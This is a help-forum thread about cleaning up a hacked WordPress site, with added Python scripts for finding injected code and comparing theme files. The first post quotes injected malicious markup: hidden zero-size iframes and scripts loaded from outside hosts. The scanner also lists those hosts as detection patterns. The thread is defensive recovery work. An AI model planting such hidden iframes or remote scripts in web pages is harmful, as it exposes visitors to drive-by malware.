# Help here for hacked site?



## nanrector (Jun 12, 2005)

Been a while since I've been here but I can't seem to find help elsewhere. Can I get any input on hunting down a script that was placed on my website? My host says they can't help. Assuming this is an appropriate question:

Found out one of my sites was down. 500 Internal Server Error. I contacted host and they said the htaccess file had something in it that they removed and it fixed it. Thing is it didn't. The page shows with graphical AAAAA's continuing to fill the top part of it. Host says they can't see it and it looks ok on their side but I inspected the element in firebug and it shows the following script below. I'm just not knowledgeable enough to figure out how to get rid of it.
Site: www.apainfultruth.com (wordpress site. I can access cpanel but not my wp admin)

When I ftp on it showed a bunch of weird short named folders with index.php in them. I deleted them all but the problem still exists. Screenshot attached along with sub-shot of a few of the folders I removed.

Any input would sure be appreciated.

Nancy


```
<body>
<iframe width="0" height="0" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" border="0" src="http://weiboyy.applinzi.com/">
<divstyle="display:none">
<script src="http://js.users.51.la/18702052.js" type="text/javascript" language="javascript">
<a title="51.La 网站流量统计系统" target="_blank" href="http://www.51.la/?18702052">
<img style="border:none" src="http://icon.51.la/icon_0.gif" alt="51.La 网站流量统计系统">
</a>
<script type="text/Javascript" src="http://u.1133.cc/d/?pid=208885&show_t=2">
<script src="http://js.users.51.la/18713595.js" type="text/javascript" language="javascript">
<a title="51.La 网站流量统计系统" target="_blank" href="http://www.51.la/?18713595">
<script src="http://niu.code668.com/page/?s=13182">
<iframe width="0" height="0" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" border="0" src="http://weiboyy.applinzi.com/">
<divstyle="display:none">
</divstyle="display:none">
</body>
```


----------
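
An added example, not part of the original thread: one way to hunt through the site's files for the markup quoted in the first post, sketched in Python. The host list is copied from that markup; the extension list, the four-character folder-name threshold and the sample tree are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Hosts copied from the injected markup quoted in the first post.
INJECTED_HOSTS = {"weiboyy.applinzi.com", "js.users.51.la", "u.1133.cc",
                  "niu.code668.com", "www.51.la", "icon.51.la"}
SCAN_EXTS = {".php", ".html", ".htm", ".js"}
MAX_SHORT_NAME = 4  # assumption: longest name treated as a "weird short" folder

HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0[\"']?(?=[\s/>])", re.I)
REMOTE_REF = re.compile(r"\b(?:src|href)\s*=\s*[\"'](https?://[^\"'\s>]+)", re.I)


def scan_text(text):
    """Return (line_number, reason) pairs for one file's contents."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if HIDDEN_IFRAME.search(line):
            hits.append((no, "zero-size iframe"))
        for url in REMOTE_REF.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host in INJECTED_HOSTS:
                hits.append((no, "reference to " + host))
    return hits


def scan_tree(root):
    """Walk a document root; return (file_hits, suspicious_dirs)."""
    file_hits, suspicious_dirs = {}, []
    for dirpath, dirnames, filenames in os.walk(root):
        # Heuristic from the post: short name, no subfolders, only index.php.
        if (dirpath != root and not dirnames and filenames == ["index.php"]
                and len(os.path.basename(dirpath)) <= MAX_SHORT_NAME):
            suspicious_dirs.append(os.path.relpath(dirpath, root))
        for fn in filenames:
            ext = os.path.splitext(fn)[1].lower()
            if fn != ".htaccess" and ext not in SCAN_EXTS:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                file_hits[os.path.relpath(path, root)] = hits
    return file_hits, sorted(suspicious_dirs)


def make_sample_site(root):
    """Write a constructed sample tree: clean file, injected file, odd folder."""
    files = {
        "index.php": "<?php // Silence is golden.\n",
        "wp-content/themes/demo/footer.php":
            '</div>\n<iframe width="0" height="0" src="http://weiboyy.applinzi.com/"></iframe>\n'
            '<script src="http://js.users.51.la/18702052.js"></script>\n',
        "xq/index.php": "<?php /* constructed placeholder */\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        make_sample_site(site)
        print(scan_tree(site))
```

Point `scan_tree()` at a downloaded copy of the site's document root. It only reads files, so content stored in the WordPress database is outside what it checks.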



## Couriant (Mar 26, 2002)

In case you hit a wall here, try https://community.spiceworks.com/programming -- the spiceworks community has helped me a lot over the last few weeks. It should be free


----------



## colinsp (Sep 5, 2007)

Looking at your screenshot this is a Wordpress site that has been hacked.

I also presume you don't have a pre-hack backup? If you do, restore that.

Recovering from a hack on a Wordpress site can be quite time consuming and difficult to do. One thing to try is installing Sucuri; it may be able to do the cleanup for you.

Alternatively you may be lucky just by doing a reinstall of Wordpress, however, as Wordpress uses a database then some malicious code may still be stored there and even with a fresh install it may reappear. It may well be easier and quicker to start again and ensure that you keep Wordpress, Themes and Plugins up to date at all times and install some security plugins such as Sucuri and Wordfence. Also ensure that you have regular backups of both your website files and the database.


----------



## JiminSA (Dec 15, 2011)

Nancy, great to see that our WordPress Guru Colin (@colinsp) has stepped in as I thought he would
I saw that like thousands of other unprotected WordPress users, you were hacked via javascript injection ...
Hopefully, this article should be of interest ...


colinsp said:


> One thing to try is installing Sucuri


I would do as Colin suggests, both now and after the clean up if you have to start from scratch ...


----------



## nanrector (Jun 12, 2005)

Thanks so much for the info. I'm beyond frustrated at myself for not having better protection in place on this particular site. It's not one that's kept updated though it does get regular traffic. I will go through all the info provided and report back.
Nancy


----------



## nanrector (Jun 12, 2005)

Well I found an old backup from a year ago which I re-uploaded. It let me back into my wp control panel. I've changed all passwords and logins. I've updated to the new WP and removed all extra themes and plugins not being used and updated to current ones. I installed Sucuri. But no matter how often I update the .htaccess file it keeps eventually getting replaced with added things in it. I'd love to have Sucuri repair it but as I'm sure with a few others I don't really have the $300 a year to fix this one issue. (Unless I read that wrong.)

Just an update. I'm going to have to figure this out myself no matter how long it takes. A good portion of my morning has been spent updating ALL my wordpress site logins and making sure they were secure.

Nancy


----------



## colinsp (Sep 5, 2007)

Nancy

Sucuri does add to the htaccess file. Post the contents of it here in code tags so we can take a look.


----------



## nanrector (Jun 12, 2005)

colinsp said:


> Nancy
> 
> Sucuri does add to the htaccess file. Post the contents of it here in code tags so we can take a look.


It seems to not be doing it now. I was sure it happened before I updated to Sucuri but I could be mistaken. I've been doing so many things to try and fix it I may have been confused. I also changed my site from no www back to the www version and though the AAA's appear to be gone there is still a blank page with a small ad on top. Interestingly when I do a Sucuri scan online the www version shows infected but the version without the www shows clean. Though I have no idea what that's about.

This is what it shows now, which seems ok to me, though again, I'm not sure what it's supposed to look like.


```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
```


----------



## nanrector (Jun 12, 2005)

Whatever I've done, my front page now just shows blank. The code is as follows. I have the skill to go in and delete what is needed but I just can't figure out what to delete or how to find it.


```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title> A Painful Truth</title>
<link rel="alternate" type="application/rss+xml" title="A Painful Truth RSS Feed" href="http://www.apainfultruth.com/feed/" />
<link rel="alternate" type="application/atom+xml" title="A Painful Truth Atom Feed" href="http://www.apainfultruth.com/feed/atom/" />
<link rel="pingback" href="http://www.apainfultruth.com/xmlrpc.php" />
<link rel="icon" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/scripts/prettyPhoto.css" type="text/css" media="screen" />
<!--[if IE]>
<link rel="stylesheet" href="http://www.apainfultruth.com/wp-content/themes/wppolitico/ie_style.css" type="text/css" />
<![endif]-->

<!--[if IE 7]><link rel='stylesheet' id='css-ie-fix' href='http://www.apainfultruth.com/wp-content/plugins/special-recent-posts/assets/css/css-ie7-fix.css' type='text/css' media='all' /> <![endif]--><link rel="alternate" type="application/rss+xml" title="A Painful Truth &raquo; Home Comments Feed" href="http://www.apainfultruth.com/home/feed/" />
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/www.apainfultruth.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.2"}};
            !function(a,b,c){function d(a){var c,d=b.createElement("canvas"),e=d.getContext&&d.getContext("2d"),f=String.fromCharCode;return e&&e.fillText?(e.textBaseline="top",e.font="600 32px Arial","flag"===a?(e.fillText(f(55356,56806,55356,56826),0,0),d.toDataURL().length>3e3):"diversity"===a?(e.fillText(f(55356,57221),0,0),c=e.getImageData(16,16,1,1).data.toString(),e.fillText(f(55356,57221,55356,57343),0,0),c!==e.getImageData(16,16,1,1).data.toString()):("simple"===a?e.fillText(f(55357,56835),0,0):e.fillText(f(55356,57135),0,0),0!==e.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>
        <style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wpts_ui_css-css'  href='http://www.apainfultruth.com/wp-content/plugins/wordpress-post-tabs/css/styles/gray/style.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='open-sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://www.apainfultruth.com/wp-includes/css/dashicons.min.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='admin-bar-css'  href='http://www.apainfultruth.com/wp-includes/css/admin-bar.min.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='srp-front-stylesheet-css'  href='http://www.apainfultruth.com/wp-content/plugins/special-recent-posts/assets/css/css-front.css?ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='adsns-css'  href='http://www.apainfultruth.com/wp-content/plugins/adsense-plugin/css/adsns.css?v=1.38&#038;ver=4.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.apainfultruth.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.4.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-email-css'  href='http://www.apainfultruth.com/wp-content/plugins/wp-email/email-css.css?ver=2.67.1' type='text/css' media='all' />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='http://www.apainfultruth.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.12' type='text/css' media='all' />
<script type='text/javascript' src='http://www.apainfultruth.com/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script>
<script type='text/javascript' src='http://www.apainfultruth.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.apainfultruth.com/wp-content/plugins/google-publisher/js/previewloader.js?ver=1.2.1'></script>
<link rel='https://api.w.org/' href='http://www.apainfultruth.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.apainfultruth.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.apainfultruth.com/wp-includes/wlwmanifest.xml" />
<link rel="canonical" href="http://www.apainfultruth.com/" />
<link rel='shortlink' href='http://www.apainfultruth.com/' />

<script type="text/javascript"><!--
var a2a_config=a2a_config||{},wpa2a={done:false,html_done:false,script_ready:false,script_load:function(){var a=document.createElement('script'),s=document.getElementsByTagName('script')[0];a.type='text/javascript';a.async=true;a.src='http://static.addtoany.com/menu/page.js';s.parentNode.insertBefore(a,s);wpa2a.script_load=function(){};},script_onready:function(){wpa2a.script_ready=true;if(wpa2a.html_done)wpa2a.init();},init:function(){for(var i=0,el,target,targets=wpa2a.targets,length=targets.length;i<length;i++){el=document.getElementById('wpa2a_'+(i+1));target=targets[i];a2a_config.linkname=target.title;a2a_config.linkurl=target.url;if(el){a2a.init('page',{target:el});el.id='';}wpa2a.done=true;}wpa2a.targets=[];}};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.callbacks.push({ready:wpa2a.script_onready});a2a_config.templates=a2a_config.templates||{};
a2a_config.show_title=1;
//--></script>

<!-- add_your_own_headers 0.4.1 -->
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6"></script>
<script type="text/javascript">AudioPlayer.setup("http://www.apainfultruth.com/wp-content/plugins/audio-player/assets/player.swf?ver=2.0.4.6", {width:"290",animation:"no",encode:"yes",initialvolume:"60",remaining:"no",noinfo:"no",buffer:"2",checkpolicy:"no",rtl:"no",bg:"d1b666",text:"0a0505",leftbg:"598DBF",lefticon:"333333",volslider:"666666",voltrack:"FFFFFF",rightbg:"598DBF",rightbghover:"999999",righticon:"333333",righticonhover:"FFFFFF",track:"FFFFFF",loader:"009900",border:"CCCCCC",tracker:"DDDDDD",skip:"666666",pagebg:"FFFFFF",transparentpagebg:"yes"});</script>
<style type='text/css'></style>

    <!-- This site uses Good Old Gallery, get it from http://wp.unwi.se/good-old-gallery -->

<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/behaviour/behaviour.js"></script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/domTT/domLib.js"></script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/domTT/domTT.js"></script>
<script type="text/javascript">var domTT_styleClass = 'hover';</script>
<script type="text/javascript" src="http://www.apainfultruth.com/wp-content/plugins/hover/hover.js"></script>
<link type="text/css" rel="stylesheet" href="http://www.apainfultruth.com/wp-content/plugins/hover/hover.css" />
<title>A Painful Truth</title><meta name="description" content="" />
<meta name="keywords" content="" />
<link type="text/css" rel="stylesheet" href="http://www.apainfultruth.com/wp-content/plugins/simple-pull-quote/css/simple-pull-quote.css" />
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");twitterWidgets.onload = _ga.trackTwitter;</script>
<meta name="google-site-verification" content="9YlkRqSNKzBpJio-RlEtLVmCLO-bgkgoXIp_Za7KnAI" /><meta name="google-site-verification" content="vT2AUg70o8qAlUq8ts6vtn1co6PRlJGFsxaX5AR_1QM" /><style type="text/css" media="all">
/* <![CDATA[ */
@import url("http://www.apainfultruth.com/wp-content/plugins/wp-table-reloaded/css/plugin.css?ver=1.9.4");
@import url("http://www.apainfultruth.com/wp-content/plugins/wp-table-reloaded/css/datatables.css?ver=1.9.4");
.wp-table-reloaded-id-2 {width: 500px;}
.wp-table-reloaded-id-3 {width: 500px;}

.wp-table-reloaded-id-2 td {
  font-family: Times New Roman;
  font-size: 15px;
  color: #000000;
}


.wp-table-reloaded-id-3 td {
  font-family: Times New Roman;
  font-size: 15px;
  color: #000000;
}

.wp-table-reloaded-id-5 td {
  font-family: Times New Roman;
  font-size: 14px;
  color: #000000;
}


.wp-table-reloaded-id-5 .row-1 .column-a {
   background-color: #ff0000;
}
/* ]]> */
</style><style type="text/css" media="print">#wpadminbar { display:none; }</style>
<style type="text/css" media="screen">
    html { margin-top: 32px !important; }
    * html body { margin-top: 32px !important; }
    @media screen and ( max-width: 782px ) {
        html { margin-top: 46px !important; }
        * html body { margin-top: 46px !important; }
    }
</style>
<meta data-pso-pv="1.2.1" data-pso-pt="front" data-pso-th="22974a56be647a7b0456cf918a2e33b2">


<!--[if lt IE 8]>
<script src="http://ie7-js.googlecode.com/svn/version/2.0(beta3)/IE8.js" type="text/javascript"></script>
<![endif]-->

<style type="text/css">
a {color:
```


----------



## colinsp (Sep 5, 2007)

Nancy

The htaccess is fine, nothing there that shouldn't be.

I get a blank page on both with and without www.

Two things to try

1: Go to Dashboard > Settings > Permalinks and change the permalink setting to something else. Save. Then change it back to how you want and save again.

2: Go to Dashboard > Settings > Reading and check what page is shown for your home page. It may be worth creating a new page that is a copy of what you want your home page to be and then assign that to be your new home page.

If this doesn't work you can create an admin account for me and PM me the login details and I will take a look if you would like.


----------



## nanrector (Jun 12, 2005)

I tried your suggestions Colin but nothing worked. No matter what inner page or post I try to go to they are all blank on the front end, even when I create new ones. I have PM'd you the info. Sure appreciate your help.

Nancy


----------



## colinsp (Sep 5, 2007)

Nancy,

Got the details will take a look later and come back to you.


----------



## nanrector (Jun 12, 2005)

Thanks Colin. Whenever you have time. Ü


----------



## colinsp (Sep 5, 2007)

Nancy

It looks like your theme is causing the problem.

I deactivated all your plugins and there was no change still a blank page. I installed the 2016 theme as you had deleted it (you should always leave at least one Wordpress default theme installed on your site). The home page displayed fine. I then re-enabled all your plugins and the site still works with the 2016 theme. The moment I switch back to your Politico theme the site breaks again. This means that either some theme files have been compromised or the theme is incompatible with Wordpress 4.4.2. I have left the 2016 theme enabled so you can see that the site works.

My advice is to delete the theme ideally by FTP to ensure there is nothing left behind and then download a fresh copy of it.

Let me know how you get on and if you need any more help.


----------
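
An added example, not part of the original thread: before a suspect theme is deleted, its files can be compared against the fresh download to see which ones differ, which separates files worth reviewing from files that are byte-for-byte the vendor's. The function names and the sample trees are constructed for illustration.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each file path (relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = digest.hexdigest()
    return digests


def compare_theme(installed_dir, fresh_dir):
    """Classify installed theme files against a freshly downloaded copy."""
    installed, fresh = hash_tree(installed_dir), hash_tree(fresh_dir)
    return {
        # Differs from the vendor copy: an injection or the owner's own tweak.
        "modified": sorted(p for p in installed
                           if p in fresh and installed[p] != fresh[p]),
        # Not shipped with the theme at all: review before trusting.
        "added": sorted(p for p in installed if p not in fresh),
        "missing": sorted(p for p in fresh if p not in installed),
    }


def write_tree(root, files):
    """Helper that writes the constructed sample data below to disk."""
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


# Constructed sample trees; file names and contents are illustrative only.
FRESH = {
    "style.css": "body { color: #000; }\n",
    "functions.php": "<?php // theme setup\n",
    "footer.php": "</div></body></html>\n",
}
INSTALLED = {
    **FRESH,
    "style.css": "body { color: #333; }\n",  # owner's customisation
    "footer.php": '<iframe width="0" height="0"></iframe>\n'
                  "</div></body></html>\n",  # injected line
    "inc/cache.php": "<?php /* not part of the theme */\n",  # extra file
}


def demo():
    """Build both sample trees in temp dirs and return the comparison."""
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        write_tree(a, INSTALLED)
        write_tree(b, FRESH)
        return compare_theme(a, b)


if __name__ == "__main__":
    print(demo())
```

The fresh copy has to be the same theme version as the installed one, otherwise every file changed between releases shows up as modified.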



## nanrector (Jun 12, 2005)

Thank you Colin so much for narrowing that down. I didn't think to do that. I will do as you suggest and get back to you asap!


----------



## nanrector (Jun 12, 2005)

I deleted the old theme and reinstalled a fresh copy. Problem solved! Not sure what I'd do without people like you donating time and helping out so willingly. Thank you again Colin for your work. I'll make sure I keep everything more secure from now on. Have a wonderful rest of your weekend!

Nancy


----------



## colinsp (Sep 5, 2007)

Glad you got it sorted. You can now delete my account.


----------



## nanrector (Jun 12, 2005)

Colin, I woke up this morning to a plethora of notices from Sucuri of failed login attempts. My site was up but my admin was giving errors as was any page I tried to edit. 
I originally got this error:

"Output has already been sent to the browser at /home/apainful/public_html/wp-includes/pomo/streams.php:1. Please make sure the command $xajax->processRequest() is placed before this."

I reuploaded that file and got another error so I just reuploaded a fresh copy of the wp-includes folder. A new error now and I can't see my site again...

<sigh> How do I fight something like this?? I changed the password and installed the security software but they still appear to be getting in. After I reinstalled a fresh copy of my theme to fix the problem I had to go in and manually correct a bunch of the pages that were tweaked on my original theme install. Quite a bit of work so I'm hoping I don't have to do that one more time... at least until I can make sure I can prevent this from happening again.












----------



## colinsp (Sep 5, 2007)

Nancy

It looks like there may have been some stuff left behind in the database that we didn't get rid of. The failed login attempts are nothing to worry about and are normal on any Wordpress site as hackers try to get in. I get many attempts every day on the Wordpress sites I look after.

I can't login to the backend and so it is difficult to do anything. You may have uploaded an incorrect version of wp-includes, it is always better to do a complete re-install of Wordpress rather than trying a piecemeal approach.

The only easy way to get your site up and running again is to delete everything and start again with a fresh install of Wordpress and a new database and then rebuild your site. The other way is to pay one of the expert firms such as Sucuri or Wordfence to clean the database for you and then sort out the rest of the site and that cost may well be more than the site is worth to you.

Sorry to be the bearer of bad news


----------



## nanrector (Jun 12, 2005)

I'm glad to know they didn't get in again anyway. It just worked so well for one day I thought I was in the clear. I may do as you suggest. Just wish I had access to the front end to copy the text from all my posts. I'll probably mess with it for a while longer before tossing in the towel. 

Thank you again for all your help!
Nancy


----------



## colinsp (Sep 5, 2007)

Nancy,

One thing you can try is backing up the database to your local machine. You could then do a local install and attach to that database with a fresh install of Wordpress in Wampserver or Desktopserver and then just export the posts. If you want to take a risk you could just copy the posts and postmeta tables to a new Wordpress install and see if that recovers them. It may be worth seeing if there is a local Wordpress expert who will help you out and try some of these things at the right price.


----------



## nanrector (Jun 12, 2005)

colinsp said:


> Nancy,
> 
> One thing you can try is backing up the database to your local machine. You could then do a local install and attach to that database with a fresh install of Wordpress in Wampserver or Desktopserver and then just export the posts. If you want to take a risk you could just copy the posts and postmeta tables to a new Wordpress install and see if that recovers them. It may be worth seeing if there is a local Wordpress expert who will help you out and try some of these things at the right price.


Ah.... thanks for that info. Very helpful.


----------

